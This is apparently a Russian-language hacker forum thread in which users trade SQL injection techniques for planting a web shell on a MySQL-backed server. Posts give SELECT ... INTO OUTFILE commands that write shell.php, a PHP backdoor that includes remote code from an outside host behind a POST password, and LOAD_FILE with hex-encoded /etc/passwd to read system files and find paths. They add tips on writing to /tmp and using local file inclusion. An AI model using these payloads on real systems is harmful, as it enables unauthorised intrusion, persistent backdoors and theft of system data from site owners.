Здравствуйте, хотел бы спросить у более знающих, какой командой можно залить файл на сервер с помощью Sql. :)


Зарание благодарен....

select 'file_content' INTO OUTFILE '/путь'

outfile


SELECT name FROM table WHERE id='0' INTO OUTFILE '/path/to/file/shell.php';

Точнее сначала нужно засунуть в запись name с id=0 пхп код ) я например люблю что-ниб вроде
<?
if ($_POST ['someshit'] == "killme")
{
include ("http://someshit.nm.ru/br/s.php");
}
else
{
die;
}
?>

а уже после делать то что написал Green_Bear =)

а не проще ли сделать

SELECT '<? include($i); ?>' FROM table INTO OUTFILE '/path/to/file/shell.php';

а если путь не известен?

а если путь не известен?
То узнай его...

']То узнай его...
Как если ошибка не выводится?

что мешает тебе загрузить /etc/passwd/, что то типа SELECT LOAD_FILE(0x2F6574632F7061737377642F) FROM table/*

это даст некое начало, исходя остальной путь пожно попробовать домумать и сделать INTO OUTFILE

или залить в /tmp/ а оттуда заинклюдить, если есть локальный инклюд.

А какая версия SQL сервера mysql, mssql &

}{0TT@БЬ)Ч
Что мешает phpinfo другие файлы с выводом ошибок пройтись по cgi посмотреть другие сайты на этом же хостинге провести аналогию..

что мешает тебе загрузить /etc/passwd/, что то типа SELECT LOAD_FILE(0x2F6574632F7061737377642F) FROM table/*

это даст некое начало, исходя остальной путь пожно попробовать домумать и сделать INTO OUTFILE

или залить в /tmp/ а оттуда заинклюдить, если есть локальный инклюд.

А какая версия SQL сервера mysql, mssql &

mysql 4.0.21 прав мало походу не могу прочесть passwd, локального инклуда нету.